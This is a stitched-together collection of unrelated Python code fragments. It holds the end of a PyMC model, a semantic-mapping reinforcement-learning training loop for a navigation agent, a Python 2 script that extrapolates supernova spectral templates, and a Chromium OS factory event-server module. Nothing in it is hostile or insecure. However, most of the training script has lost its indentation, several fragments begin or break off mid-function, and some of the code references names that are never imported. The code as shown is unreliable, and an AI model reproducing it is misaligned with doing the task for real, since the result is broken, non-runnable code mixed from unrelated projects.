            pm.Potential("log-likelihood", logl(theta))

    return basic_model
def | |
from collections import deque, defaultdict
import os
import sys
import logging
import time
import json
import gym
import torch.nn as nn
import torch
import numpy as np
import matplotlib.pyplot as plt
from model import RL_Policy, Semantic_Mapping
from utils.storage import GlobalRolloutStorage
from envs import make_vec_envs
from arguments import get_args
import algo
os.environ["OMP_NUM_THREADS"] = "1"
def main():
args = get_args()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.cuda:
torch.cuda.manual_seed(args.seed)
# Setup Logging
log_dir = "{}/models/{}/".format(args.dump_location, args.exp_name)
dump_dir = "{}/dump/{}/".format(args.dump_location, args.exp_name)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
if not os.path.exists(dump_dir):
os.makedirs(dump_dir)
logging.basicConfig(
filename=log_dir + 'train.log',
level=logging.INFO)
print("Dumping at {}".format(log_dir))
print(args)
logging.info(args)
# Logging and loss variables
num_scenes = args.num_processes
num_episodes = int(args.num_eval_episodes)
device = args.device = torch.device("cuda:0" if args.cuda else "cpu")
g_masks = torch.ones(num_scenes).float().to(device)
best_g_reward = -np.inf
# one episode per process for both train and eval
# for eval, one scene per process
if args.eval:
episode_success = []
episode_spl = []
episode_dist = []
for _ in range(args.num_processes):
episode_success.append(deque(maxlen=num_episodes))
episode_spl.append(deque(maxlen=num_episodes))
episode_dist.append(deque(maxlen=num_episodes))
# for train, different episodes of same scene per process
else:
episode_success = deque(maxlen=1000)
episode_spl = deque(maxlen=1000)
episode_dist = deque(maxlen=1000)
finished = np.zeros((args.num_processes))
wait_env = np.zeros((args.num_processes))
g_episode_rewards = deque(maxlen=1000)
g_value_losses = deque(maxlen=1000)
g_action_losses = deque(maxlen=1000)
g_dist_entropies = deque(maxlen=1000)
per_step_g_rewards = deque(maxlen=1000)
g_process_rewards = np.zeros((num_scenes))
# Starting environments
torch.set_num_threads(1)
envs = make_vec_envs(args)
obs, infos = envs.reset()
full_episode_data = []
episode_data = [None] * num_scenes
for e, info in enumerate(infos):
cInfo = info.copy()
cInfo["episode_data"]["positions"] = []
cInfo["episode_data"]["gt_positions"] = []
cInfo["episode_data"]["goal_rewards"] = []
cInfo["episode_data"]["explore_rewards"] = []
cInfo["episode_data"]["policy_goals"] = []
cInfo["episode_data"]["used_policy"] = []
episode_data[e] = cInfo["episode_data"]
torch.set_grad_enabled(False)
# Initialize map variables:
# Full map consists of multiple channels containing the following:
# 1. Obstacle Map
# 2. Exploread Area (places that are known to be free or occupied)
# 3. Current Agent Location
# 4. Past Agent Locations
# 5,6,7,.. : Semantic Categories
nc = args.num_sem_categories + 4 # num channels
# Calculating full and local map sizes
map_size = args.map_size_cm // args.map_resolution
full_w, full_h = map_size, map_size
local_w = int(full_w / args.global_downscaling)
local_h = int(full_h / args.global_downscaling)
# Initializing full and local map
full_map = torch.zeros(num_scenes, nc, full_w, full_h).float().to(device)
local_map = torch.zeros(num_scenes, nc, local_w,
local_h).float().to(device)
# Initial full and local pose
full_pose = torch.zeros(num_scenes, 3).float().to(device)
local_pose = torch.zeros(num_scenes, 3).float().to(device)
# Origin of local map
origins = np.zeros((num_scenes, 3))
# Local Map Boundaries
lmb = np.zeros((num_scenes, 4)).astype(int)
# Planner pose inputs has 7 dimensions
# 1-3 store continuous global agent location
# 4-7 store local map boundaries
planner_pose_inputs = np.zeros((num_scenes, 7))
# get local boundary (x1, x2, y1, y2) given local agent position (x, y) and map size
def get_local_map_boundaries(agent_loc, local_sizes, full_sizes):
    """Return [gx1, gx2, gy1, gy2], the local-map window in full-map cells.

    The window is centered on the agent and clamped to the full map;
    without downscaling the local map is simply the whole map.
    """
    loc_r, loc_c = agent_loc
    local_w, local_h = local_sizes
    full_w, full_h = full_sizes

    if args.global_downscaling > 1:
        # center the window on the agent
        gx1 = loc_r - local_w // 2
        gy1 = loc_c - local_h // 2
        gx2 = gx1 + local_w
        gy2 = gy1 + local_h
        # clamp each axis independently to the full-map extent
        if gx1 < 0:
            gx1, gx2 = 0, local_w
        if gx2 > full_w:
            gx1, gx2 = full_w - local_w, full_w
        if gy1 < 0:
            gy1, gy2 = 0, local_h
        if gy2 > full_h:
            gy1, gy2 = full_h - local_h, full_h
    else:
        gx1, gx2, gy1, gy2 = 0, full_w, 0, full_h

    return [gx1, gx2, gy1, gy2]
# initialize global and local maps and poses given that initial position
# is at map center with 0 orientation
def init_map_and_pose():
    """Reset all maps/poses: agents start at the map center, heading 0.

    Mutates the enclosing scope's full_map, full_pose, local_map,
    local_pose, planner_pose_inputs, lmb and origins in place.
    """
    full_map.fill_(0.)
    full_pose.fill_(0.)
    # center of the map, in meters (map_size_cm is in cm)
    full_pose[:, :2] = args.map_size_cm / 100.0 / 2.0

    locs = full_pose.cpu().numpy()
    planner_pose_inputs[:, :3] = locs
    for e in range(num_scenes):
        r, c = locs[e, 1], locs[e, 0]
        # meters -> map cells
        loc_r, loc_c = [int(r * 100.0 / args.map_resolution),
                        int(c * 100.0 / args.map_resolution)]

        # 3x3 grid around agent location is considered explored
        full_map[e, 2:4, loc_r - 1:loc_r + 2, loc_c - 1:loc_c + 2] = 1.0

        lmb[e] = get_local_map_boundaries((loc_r, loc_c),
                                          (local_w, local_h),
                                          (full_w, full_h))

        planner_pose_inputs[e, 3:] = lmb[e]
        # local-map origin in meters, used to convert full pose -> local pose
        origins[e] = [lmb[e][2] * args.map_resolution / 100.0,
                      lmb[e][0] * args.map_resolution / 100.0, 0.]

    for e in range(num_scenes):
        # crop the full map to the local window and shift the pose into it
        local_map[e] = full_map[e, :,
                                lmb[e, 0]:lmb[e, 1],
                                lmb[e, 2]:lmb[e, 3]]
        local_pose[e] = full_pose[e] - \
            torch.from_numpy(origins[e]).to(device).float()
# identical to above, except for specific environment
def init_map_and_pose_for_env(e):
    """Reset maps and pose for a single environment *e*.

    Identical to init_map_and_pose but scoped to one scene; used when an
    episode in that scene finishes.
    """
    full_map[e].fill_(0.)
    full_pose[e].fill_(0.)
    # start at the map center, in meters
    full_pose[e, :2] = args.map_size_cm / 100.0 / 2.0

    locs = full_pose[e].cpu().numpy()
    planner_pose_inputs[e, :3] = locs
    r, c = locs[1], locs[0]
    # meters -> map cells
    loc_r, loc_c = [int(r * 100.0 / args.map_resolution),
                    int(c * 100.0 / args.map_resolution)]

    # 3x3 neighborhood around the agent counts as explored
    full_map[e, 2:4, loc_r - 1:loc_r + 2, loc_c - 1:loc_c + 2] = 1.0

    lmb[e] = get_local_map_boundaries((loc_r, loc_c),
                                      (local_w, local_h),
                                      (full_w, full_h))

    planner_pose_inputs[e, 3:] = lmb[e]
    # local-map origin in meters for full->local pose conversion
    origins[e] = [lmb[e][2] * args.map_resolution / 100.0,
                  lmb[e][0] * args.map_resolution / 100.0, 0.]

    local_map[e] = full_map[e, :, lmb[e, 0]:lmb[e, 1], lmb[e, 2]:lmb[e, 3]]
    local_pose[e] = full_pose[e] - \
        torch.from_numpy(origins[e]).to(device).float()
    # reward is the newly explored area in a given step (in m^2)
    def update_intrinsic_rew(e):
        """Set intrinsic_rews[e] to the area newly explored this step.
        Writes the local map back into the full map first, then measures
        the change in the explored channel (full_map[e, 1]) and converts
        cell counts to square meters.
        """
        prev_explored_area = full_map[e, 1].sum(1).sum(0)
        full_map[e, :, lmb[e, 0]:lmb[e, 1], lmb[e, 2]:lmb[e, 3]] = \
            local_map[e]
        curr_explored_area = full_map[e, 1].sum(1).sum(0)
        intrinsic_rews[e] = curr_explored_area - prev_explored_area
        # each cell is (map_resolution cm)^2; convert to m^2
        intrinsic_rews[e] *= (args.map_resolution / 100.)**2 # to m^2
def get_random_goal(e):
for _ in range(20):
goal = np.random.rand(2)
goal = [int(goal[0] * local_w), int(goal[1] * local_w)]
goal = [min(goal[0], int(local_w-1)), min(goal[1], int(local_w-1))]
if not local_map[e, 1, goal[0], goal[1]]: break
return goal
init_map_and_pose()
# Global policy observation space
ngc = 8 + args.num_sem_categories
es = 2
g_observation_space = gym.spaces.Box(0, 1, # binary local map
(ngc,
local_w,
local_h), dtype='uint8')
# Semantic Mapping
sem_map_module = Semantic_Mapping(args).to(device)
sem_map_module.eval()
intrinsic_rews = torch.zeros(num_scenes).to(device)
# Predict semantic map from frame 1
poses = torch.from_numpy(np.asarray(
[infos[env_idx]['sensor_pose'] for env_idx in range(num_scenes)])
).float().to(device)
# args (obs, pose_obs, maps_last, poses_last)
_, local_map, _, local_pose = \
sem_map_module(obs, poses, local_map, local_pose)
locs = local_pose.cpu().numpy()
for e in range(num_scenes):
r, c = locs[e, 1], locs[e, 0]
loc_r, loc_c = [int(r * 100.0 / args.map_resolution),
int(c * 100.0 / args.map_resolution)]
local_map[e, 2:4, loc_r - 1:loc_r + 2, loc_c - 1:loc_c + 2] = 1.
episode_data[e]["positions"].append([int(loc_r + lmb[e, 0]), int(loc_c + lmb[e, 2]), int(locs[e, 2])])
episode_data[e]["gt_positions"].append(list(infos[e]["gt_pos"]))
global_goals = [get_random_goal(e) for e in range(num_scenes)]
goal_maps = [np.zeros((local_w, local_h)) for _ in range(num_scenes)]
for e in range(num_scenes):
goal_maps[e][global_goals[e][0], global_goals[e][1]] = 1
episode_data[e]["policy_goals"].append(((global_goals[e] + lmb[e, [0,2]]).tolist(), 0))
episode_data[e]["used_policy"].append(True)
planner_inputs = [{} for e in range(num_scenes)]
for e, p_input in enumerate(planner_inputs):
p_input['map_pred'] = local_map[e, 0, :, :].cpu().numpy() # obstacles
p_input['exp_pred'] = local_map[e, 1, :, :].cpu().numpy() # explored
p_input['pose_pred'] = planner_pose_inputs[e] # global location+local map bounds
p_input['goal'] = goal_maps[e] # global_goals[e]
p_input['new_goal'] = 1
p_input['found_goal'] = 0
p_input['wait'] = wait_env[e] or finished[e]
if args.visualize or args.print_images:
local_map[e, -1, :, :] = 1e-5 # TODO: what is this?
# single channel where each grid loc is cat ID
p_input['sem_map_pred'] = local_map[e, 4:, :, :
].argmax(0).cpu().numpy()
obs, _, done, infos = envs.plan_act_and_preprocess(planner_inputs)
start = time.time()
g_reward = 0
torch.set_grad_enabled(False)
spl_per_category = defaultdict(list)
success_per_category = defaultdict(list)
for step in range(args.num_training_frames // args.num_processes + 1):
if finished.sum() == args.num_processes:
break
g_step = (step // args.num_local_steps) % args.num_global_steps # global step num in PPO
l_step = step % args.num_local_steps # local step num in global step
# ------------------------------------------------------------------
# Reinitialize variables when episode ends
l_masks = torch.FloatTensor([0 if x else 1
for x in done]).to(device)
g_masks *= l_masks
for e, x in enumerate(done):
if x:
spl = infos[e]['spl']
success = infos[e]['success']
dist = infos[e]['distance_to_goal']
spl_per_category[infos[e]['goal_name']].append(spl)
success_per_category[infos[e]['goal_name']].append(success)
if args.eval:
episode_success[e].append(success)
episode_spl[e].append(spl)
episode_dist[e].append(dist)
if len(episode_success[e]) == num_episodes:
finished[e] = 1
episode_data[e]["success"] = success
episode_data[e]["spl"] = spl
episode_data[e]["distance_to_goal"] = dist
full_map[e, :, lmb[e, 0]:lmb[e, 1], lmb[e, 2]:lmb[e, 3]] = local_map[e]
episode_data[e]["explored_area"] = full_map[e, 1].sum(1).sum(0).item()
scene = episode_data[e]["scene_id"][16:-4]
if args.save_maps:
np.save('{}/maparr_{}_{}'.format(dump_dir, scene, episode_data[e]['episode_id']), full_map[e].cpu().numpy())
full_episode_data.append(episode_data[e])
cInfo = infos[e].copy()
cInfo["episode_data"]["positions"] = []
cInfo["episode_data"]["gt_positions"] = []
cInfo["episode_data"]["goal_rewards"] = []
cInfo["episode_data"]["explore_rewards"] = []
cInfo["episode_data"]["policy_goals"] = []
cInfo["episode_data"]["used_policy"] = []
episode_data[e] = cInfo["episode_data"]
else:
episode_success.append(success)
episode_spl.append(spl)
episode_dist.append(dist)
wait_env[e] = 1.
update_intrinsic_rew(e)
init_map_and_pose_for_env(e)
# ------------------------------------------------------------------
# ------------------------------------------------------------------
# Semantic Mapping Module
poses = torch.from_numpy(np.asarray(
[infos[env_idx]['sensor_pose'] for env_idx
in range(num_scenes)])
).float().to(device)
_, local_map, _, local_pose = \
sem_map_module(obs, poses, local_map, local_pose)
locs = local_pose.cpu().numpy()
planner_pose_inputs[:, :3] = locs + origins
local_map[:, 2, :, :].fill_(0.) # Resetting current location channel
# update current location
for e in range(num_scenes):
r, c = locs[e, 1], locs[e, | |
<filename>SNDATA_ADDONS/snsedextend.py
#! /usr/bin/env python
#S.rodney
# 2011.05.04
"""
Extrapolate the Hsiao SED down to 300 angstroms
to allow the W filter to reach out to z=2.5 smoothly
in the k-correction tables
"""
import os
from numpy import *
from pylab import *
sndataroot = os.environ['SNDATA_ROOT']
MINWAVE = 300 # min wavelength for extrapolation (Angstroms)
MAXWAVE = 18000 # max wavelength for extrapolation (Angstroms)
def mkSALT2_UV2IR( showplots=False ) :
    """ do all the extrapolations needed to extend the SALT2
    model deep into the UV and the IR (300 to 25000 angstroms)
    and out to +100 days after peak.
    Reads models/SALT2/SALT2.Guy10_LAMOPEN and writes the extended model
    into models/SALT2/SALT2.Guy10_UV2IR (both under $SNDATA_ROOT):
    copies the color-correction file, rewrites SALT2.INFO with the wide
    rest-lambda range, splices extended tails onto the two template
    components, and flatline-extrapolates the (co)variance maps.
    """
    import shutil
    indir = os.path.join( sndataroot, 'models/SALT2/SALT2.Guy10_LAMOPEN' )
    outdir = os.path.join( sndataroot, 'models/SALT2/SALT2.Guy10_UV2IR' )
    # copy the color correction file over unchanged, only if not present
    indat = os.path.join(indir,'salt2_color_correction.dat')
    outdat = os.path.join(outdir,'salt2_color_correction.dat')
    if not os.path.isfile( outdat ) : shutil.copy( indat, outdat )
    # rewrite the model INFO file with the opened-up wavelength range
    outinfo = os.path.join(outdir,'SALT2.INFO')
    fout = open(outinfo,'w')
    print >> fout, """
# open rest-lambda range WAAAY beyond nominal 2900-7000 A range.
RESTLAMBDA_RANGE: 300. 25000.
COLORLAW_VERSION: 1
COLORCOR_PARAMS: 2800 7000 4 -0.537186 0.894515 -0.513865 0.0891927
COLOR_OFFSET: 0.0
MAG_OFFSET: 0.27
SEDFLUX_INTERP_OPT: 1 # 1=>linear, 2=>spline
ERRMAP_INTERP_OPT: 1 # 0=snake off; 1=>linear 2=>spline
ERRMAP_KCOR_OPT: 1 # 1/0 => on/off
MAGERR_FLOOR: 0.005 # don;t allow smaller error than this
MAGERR_LAMOBS: 0.1 2000 4000 # magerr minlam maxlam
MAGERR_LAMREST: 0.1 100 200 # magerr minlam maxlam
"""
    # NOTE(review): fout is never explicitly closed; CPython closes it when
    # the function exits, but an explicit fout.close() here would be safer.
    extendSALT2_temp0( salt2dir = 'models/SALT2/SALT2.Guy10_UV2IR',
                       tailsedfile = 'snsed/Hsiao07.extrap.dat',
                       wjoinblue = 2800, wjoinred = 8500 ,
                       wmin = 300, wmax = 25000, tmin=-20, tmax=100,
                       showplots=showplots )
    extendSALT2_temp1( salt2dir = 'models/SALT2/SALT2.Guy10_UV2IR',
                       wjoinblue = 2000, wjoinred = 8500 ,
                       wmin = 300, wmax = 25000, tmin=-20, tmax=100,
                       wstep = 10, showplots=showplots )
    # flatline-extrapolate the dispersion / variance / covariance maps
    for sedfile in ['salt2_lc_dispersion_scaling.dat',
                    'salt2_lc_relative_covariance_01.dat',
                    'salt2_lc_relative_variance_0.dat',
                    'salt2_lc_relative_variance_1.dat',
                    'salt2_spec_covariance_01.dat',
                    'salt2_spec_variance_0.dat',
                    'salt2_spec_variance_1.dat' ] :
        indat = os.path.join( indir, sedfile )
        outdat = os.path.join( outdir, sedfile )
        extrapolatesed_flatline( indat, outdat, showplots=showplots )
def getsed( sedfile = os.path.join( sndataroot, 'snsed/Hsiao07.dat') ) :
    """Read a 3-column SED file (day, wavelength, flux) and group it by
    epoch.  Returns a tuple (dlist, wlist, flist): parallel lists with
    one array per unique day, in ascending day order.
    """
    day_col, wave_col, flux_col = loadtxt( sedfile, unpack=True )
    #day_col = day_col.astype(int)
    dlist, wlist, flist = [], [], []
    for day in unique( day_col ) :
        mask = where( day_col == day )
        dlist.append( day_col[ mask ] )
        wlist.append( wave_col[ mask ] )
        flist.append( flux_col[ mask ] )
    return( dlist, wlist, flist )
def plotsed( sedfile= os.path.join( sndataroot, 'snsed/Hsiao07.dat'),
             day='all', normalize=False, **kwarg):
    """Plot flux vs wavelength for epochs of the given SED file.
    day : 'all' plots every epoch; a number plots only epochs within
          0.6 days of it.
    normalize : if True, scale each epoch to peak=1 and offset it
          vertically by its day number (stacked-spectra view).
    Extra keyword arguments are passed through to pylab.plot.
    """
    dlist,wlist,flist = getsed( sedfile )
    #days = unique( dlist )
    for i in range( len(wlist) ) :
        # all entries of dlist[i] share the same day; take the first
        thisday = dlist[i][0]
        #defaults = { 'label':str(thisday) }
        #plotarg = dict( kwarg.items() + defaults.items() )
        if day!='all' :
            if abs(thisday-day)>0.6 : continue
        if normalize :
            plot( wlist[i], flist[i]/flist[i].max()+thisday, **kwarg )
        else :
            plot( wlist[i], flist[i], label=str(thisday), **kwarg )
        # user_in=raw_input('%i : return to continue'%i)
def extrapolatesed_linear(sedfile, newsedfile, minwave=MINWAVE, maxwave=MAXWAVE, Npt=2,tmin=-20, tmax=100, showplots=False ):
    """ use a linear fit of the first/last Npt points on the SED
    to extrapolate each epoch bluward to minwave and redward to maxwave.
    Negative extrapolated fluxes are clipped to zero.  The extended SED
    is written to newsedfile (day / wavelength / flux columns), whose
    name is returned.  tmin/tmax/showplots are accepted but unused here.
    """
    from scipy import interpolate as scint
    from scipy import stats
    import shutil
    dlist,wlist,flist = getsed( sedfile )
    dlistnew, wlistnew, flistnew = [],[],[]
    fout = open( newsedfile, 'w' )
    for i in range( len(dlist) ) :
        d,w,f = dlist[i],wlist[i],flist[i]
        # assumes a uniform wavelength grid within each epoch
        wavestep = w[1] - w[0]
        # blueward linear extrapolation from first N points
        wN = w[:Npt]
        fN = f[:Npt]
        (a,b,rval,pval,stderr)=stats.linregress(wN,fN)
        Nbluestep = len( arange( minwave, w[0], wavestep ) )
        wextBlue = sorted( [ w[0] -(i+1)*wavestep for i in range(Nbluestep) ] )
        fextBlue = array( [ max( 0, a * wave + b ) for wave in wextBlue ] )
        # redward linear extrapolation from last N points
        wN = w[-Npt:]
        fN = f[-Npt:]
        (a,b,rval,pval,stderr)=stats.linregress(wN,fN)
        Nredstep = len( arange( w[-1], maxwave, wavestep ) )
        wextRed = sorted( [ w[-1] + (i+1)*wavestep for i in range(Nredstep) ] )
        fextRed = array( [ max( 0, a * wave + b ) for wave in wextRed ] )
        wnew = append( append( wextBlue, w ), wextRed )
        fnew = append( append( fextBlue, f ), fextRed )
        # dnew = zeros( len(wnew) ) + d[0]
        # NOTE(review): the comprehensions above and the loop below reuse
        # the outer loop variable i (Python 2 leaks comprehension vars);
        # harmless because the outer for rebinds i, but fragile.
        for i in range( len( wnew ) ) :
            print >> fout, "%5.1f %10i %12.7e"%( d[0], wnew[i], fnew[i] )
    fout.close()
    return( newsedfile )
def extrapolatesed_flatline(sedfile, newsedfile, minwave=MINWAVE, maxwave=MAXWAVE, tmin=-20, tmax=100, showplots=False ):
    """ Extend an SED in wavelength and time, writing to newsedfile.
    For each integer day in [tmin,tmax] present in the input SED, the
    epoch is flatline-extrapolated: constant at f[0] bluward to minwave
    and constant at f[-1] redward to maxwave.  For days missing from the
    input (e.g. beyond the last observed epoch), the most recent extended
    epoch is reused, scaled by the median day-to-day flux ratio of the
    last ~20 real epochs.  Returns newsedfile.
    NOTE(review): if the first day of [tmin,tmax] is absent from the
    input, fnew and thisdaylast are referenced before assignment
    (NameError); the scaling also needs at least two real epochs in
    fmed.  Presumably the inputs always cover the early epochs --
    confirm against callers.
    """
    from scipy import interpolate as scint
    from scipy import stats
    import shutil
    dlist,wlist,flist = getsed( sedfile )
    dlistnew, wlistnew, flistnew = [],[],[]
    olddaylist = [ round(d) for d in unique(ravel(array(dlist))) ]
    fout = open( newsedfile, 'w' )
    newdaylist = range( tmin, tmax+1 )
    fmed = []
    for thisday in newdaylist :
        if thisday in olddaylist :
            iday = olddaylist.index( thisday )
            d,w,f = dlist[iday],wlist[iday],flist[iday]
            # assumes a uniform wavelength grid within the epoch
            wavestep = w[1] - w[0]
            # blueward flatline extrapolation from first point
            Nbluestep = len( arange( minwave, w[0], wavestep ) )
            wextBlue = sorted( [ w[0] -(i+1)*wavestep for i in range(Nbluestep) ] )
            fextBlue = array( [ f[0] for wave in wextBlue ] )
            # redward flatline extrapolation from last point
            Nredstep = len( arange( w[-1], maxwave, wavestep ) )
            wextRed = sorted( [ w[-1] + (i+1)*wavestep for i in range(Nredstep) ] )
            fextRed = array( [ f[-1] for wave in wextRed ] )
            wnew = append( append( wextBlue, w ), wextRed )
            fnew = append( append( fextBlue, f ), fextRed )
            # track the median flux of each real epoch for the decay rate
            fmed.append( median(f) )
        else :
            # decay the last extended epoch by the recent median per-day ratio
            fscaleperday = median( array(fmed[-19:]) / array(fmed[-20:-1]) )
            fnew = fnew * fscaleperday**(thisday-thisdaylast)
        if showplots :
            clf()
            # NOTE(review): w and f here are from the most recent real
            # epoch, not necessarily thisday's.
            plot( w, f, 'r-' )
            plot( wnew, fnew, 'k--' )
            ax = gca()
            rcParams['text.usetex']=False
            text(0.95,0.95,'%s\nDay=%i'%(os.path.basename(newsedfile),thisday),ha='right',va='top',transform=ax.transAxes )
            draw()
            userin = raw_input('return to continue')
        for i in range( len( wnew ) ) :
            print >> fout, "%5.1f %10i %12.7e"%( thisday, wnew[i], fnew[i] )
        thisdaylast = thisday
    fout.close()
    return( newsedfile )
def extendNon1a():
    """Linearly extrapolate every non-Ia SED template found in
    non1a/SED_NOEXTRAP/, writing the extended versions into non1a/.
    """
    import glob
    import shutil
    for sedfile in glob.glob("non1a/SED_NOEXTRAP/*.SED"):
        newsedfile = 'non1a/' + os.path.basename(sedfile)
        print("EXTRAPOLATING %s"%sedfile)
        extrapolatesed_linear(sedfile, newsedfile, minwave=MINWAVE,
                              maxwave=MAXWAVE, tmin=-20, tmax=100, Npt=2)
        print(" Done with %s.\a\a\a"%sedfile)
def extendSALT2_temp0( salt2dir = 'models/SALT2/SALT2.Guy10_UV2IR',
tailsedfile = 'snsed/Hsiao07.extrap.dat',
wjoinblue = 2800, wjoinred = 8500 ,
wmin = 300, wmax = 25000, tmin=-20, tmax=100,
showplots=False ):
""" extend the salt2 Template_0 model component
by adopting the UV and IR tails from another SED model.
The default is to use SR's extrapolated modification
of the Hsiao 2007 sed model, scaled and joined at the
wjoin wavelengths, and extrapolated out to wmin and wmax.
"""
import shutil
sndataroot = os.environ['SNDATA_ROOT']
salt2dir = os.path.join( sndataroot, salt2dir )
temp0fileIN = os.path.join( salt2dir, '../SALT2.Guy10_LAMOPEN/salt2_template_0.dat' )
temp0fileOUT = os.path.join( salt2dir, 'salt2_template_0.dat' )
temp0dat = getsed( sedfile=temp0fileIN )
tailsedfile = os.path.join( sndataroot, tailsedfile )
taildat = getsed( sedfile=tailsedfile )
dt,wt,ft = loadtxt( tailsedfile, unpack=True )
taildays = unique( dt )
fscale = []
# build up modified template from day -20 to +100
outlines = []
daylist = range( tmin, tmax+1 )
for i in range( len(daylist) ) :
thisday = daylist[i]
if thisday < 50 :
# get the tail SED for this day from the Hsiao template
it = where( taildays == thisday )[0]
dt = taildat[0][it]
wt = taildat[1][it]
ft = taildat[2][it]
# get the SALT2 template SED for this day
d0 = temp0dat[0][i]
w0 = temp0dat[1][i]
f0 = temp0dat[2][i]
print( 'splicing tail onto template for day : %i'%thisday )
i0blue = argmin( abs(w0-wjoinblue) )
itblue = argmin( abs( wt-wjoinblue))
i0red = argmin( abs(w0-wjoinred) )
itred = argmin( abs( wt-wjoinred))
itmin = argmin( abs( wt-wmin))
itmax = argmin( abs( wt-wmax))
bluescale = f0[i0blue]/ft[itblue]
redscale = f0[i0red]/ft[itred]
d0new = dt.tolist()[itmin:itblue] + d0.tolist()[i0blue:i0red] + dt.tolist()[itred:itmax+1]
w0new = wt.tolist()[itmin:itblue] + w0.tolist()[i0blue:i0red] + wt.tolist()[itred:itmax+1]
f0newStage = (bluescale*ft).tolist()[itmin:itblue] + f0.tolist()[i0blue:i0red] + (redscale*ft).tolist()[itred:itmax+1]
# compute the flux scaling decrement from the last epoch (for extrapolation)
if i>1: fscale.append( np.where( np.array(f0newStage)<=0, 0, ( np.array(f0newStage) / np.array(f0new) ) ) )
f0new = f0newStage
# elif thisday < 85 : | |
# Copyright 2012 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import abc
import errno
import json
import logging
import os
import pickle
import queue
import select
import socket
import socketserver
import sys
import tempfile
import threading
import time
import traceback
from cros.factory.utils import file_utils
from cros.factory.utils import process_utils
from cros.factory.utils import time_utils
from cros.factory.utils import type_utils
# Environment variable storing the path to the endpoint.
CROS_FACTORY_EVENT = 'CROS_FACTORY_EVENT'
# Maximum allowed size for messages. If messages are bigger than this, they
# will be truncated by the seqpacket sockets.
_MAX_MESSAGE_SIZE = 65535
# Maximum size of logged event data in debug log. Sometimes a test may pass
# large data to JavaScript functions. If all of it is logged, it can easily take
# up all disk space.
_MAX_EVENT_SIZE_FOR_DEBUG_LOG = 512
# Hello message send by the server and expected as the first datagram by
# the client.
_HELLO_MESSAGE = b'\1'
def json_default_repr(obj):
  """Converts an object into a suitable representation for
  JSON-ification.

  If obj has an instance __dict__, this returns a dict with all
  properties not beginning in '_'. Otherwise, the original object is
  returned.
  """
  # Fix: the original tested `isinstance(obj, object)`, which is always
  # true in Python 3, making the fallback branch dead and raising
  # AttributeError for objects without a __dict__ (e.g. __slots__
  # instances).  Keying on __dict__ presence keeps the documented
  # behavior for both cases.
  attrs = getattr(obj, '__dict__', None)
  if attrs is not None:
    return {k: v for k, v in attrs.items() if not k.startswith('_')}
  return obj
class Event:
  """An event object that may be written to the event server.

  Arbitrary keyword arguments become attributes of the event.

  E.g.:
    event = Event(Event.Type.STATE_CHANGE,
                  test='foo.bar',
                  state=TestState(...))
  """

  class Type:
    """Namespace of well-known event type strings."""
    # The state of a test has changed.
    STATE_CHANGE = 'goofy:state_change'
    # The UI has come up.
    UI_READY = 'goofy:ui_ready'
    # Tells goofy to clear all state and restart testing.
    RESTART_TESTS = 'goofy:restart_tests'
    # Tells goofy to run all tests that haven't been run yet.
    AUTO_RUN = 'goofy:auto_run'
    # Tells goofy to set all failed tests' state to untested and re-run.
    RUN_TESTS_WITH_STATUS = 'goofy:run_tests_with_status'
    # Clears state of all tests underneath the given path.
    CLEAR_STATE = 'goofy:clear_state'
    # Tells the UI about a single new line in the log.
    LOG = 'goofy:log'
    # A hello message to a new WebSocket. Contains a 'uuid' parameter
    # identifying the particular invocation of the server.
    HELLO = 'goofy:hello'
    # A keepalive message from the UI. Contains a 'uuid' parameter
    # containing the same 'uuid' value received when the client received
    # its HELLO.
    KEEPALIVE = 'goofy:keepalive'
    # Initializes the test UI.
    INIT_TEST_UI = 'goofy:init_test_ui'
    # Sets layout for the test UI.
    SET_TEST_UI_LAYOUT = 'goofy:set_test_ui_layout'
    # Sets the UI in the test pane.
    SET_HTML = 'goofy:set_html'
    # Import a HTML fragment to test pane.
    IMPORT_HTML = 'goofy:import_html'
    # Runs JavaScript in the test pane.
    RUN_JS = 'goofy:run_js'
    # Performs a remote procedure call to the Chrome extension inside UI.
    EXTENSION_RPC = 'goofy:extension_rpc'
    # Event from a test UI.
    TEST_UI_EVENT = 'goofy:test_ui_event'
    # Message from test UI to new event loop to end the event loop.
    END_EVENT_LOOP = 'goofy:end_event_loop'
    # Message to tell the test UI to destroy itself.
    DESTROY_TEST = 'goofy:destroy_test'
    # Message telling Goofy should re-read system info.
    UPDATE_SYSTEM_INFO = 'goofy:update_system_info'
    # Tells Goofy to stop all tests.
    STOP = 'goofy:stop'
    # Indicates a pending shutdown.
    PENDING_SHUTDOWN = 'goofy:pending_shutdown'
    # Cancels a pending shutdown.
    CANCEL_SHUTDOWN = 'goofy:cancel_shutdown'
    # Tells UI to update notes.
    UPDATE_NOTES = 'goofy:update_notes'
    # Diagnosis Tool's events
    DIAGNOSIS_TOOL_EVENT = 'goofy:diagnosis_tool:event'
    # Notifies that factory server config (URL, timeout) is changed.
    FACTORY_SERVER_CONFIG_CHANGED = 'factory_server:config_changed'
    # Notifies that the iterations or retries of a factory test is changed.
    SET_ITERATIONS_AND_RETRIES = 'goofy:set_iterations_and_retries'

  def __init__(self, type, **kw): # pylint: disable=redefined-builtin
    """Constructor.

    Args:
      type: The event type, usually one of Event.Type.
      **kw: Arbitrary attributes to attach to the event.
    """
    self.type = type
    self.timestamp = time.time()
    for k, v in kw.items():
      setattr(self, k, v)

  def __repr__(self):
    """Returns a debug representation, with type/timestamp shown first."""
    return type_utils.StdRepr(
        self,
        extra=[
            'type=%s' % self.type,
            'timestamp=%s' % time.ctime(self.timestamp)],
        excluded_keys=['type', 'timestamp'])

  def to_json(self):
    """Serializes the event to JSON; '_'-prefixed attributes are dropped
    (see json_default_repr)."""
    return json.dumps(self, default=json_default_repr)

  @staticmethod
  def from_json(encoded_event):
    """Reconstructs an Event from a JSON string produced by to_json."""
    kw = json.loads(encoded_event)
    type = kw.pop('type') # pylint: disable=redefined-builtin
    return Event(type=type, **kw)

  def __eq__(self, other):
    # Equality compares public attributes only (the same filter used for
    # JSON serialization).  NOTE: defining __eq__ without __hash__ makes
    # Event instances unhashable in Python 3.
    return (isinstance(other, Event) and
            json_default_repr(self) == json_default_repr(other))

  def __ne__(self, other):
    return not self == other
_unique_id_lock = threading.Lock()
_unique_id = 1


def get_unique_id():
  """Returns a new process-wide unique integer (1, 2, 3, ...)."""
  global _unique_id  # pylint: disable=global-statement
  with _unique_id_lock:
    current = _unique_id
    _unique_id = current + 1
  return current
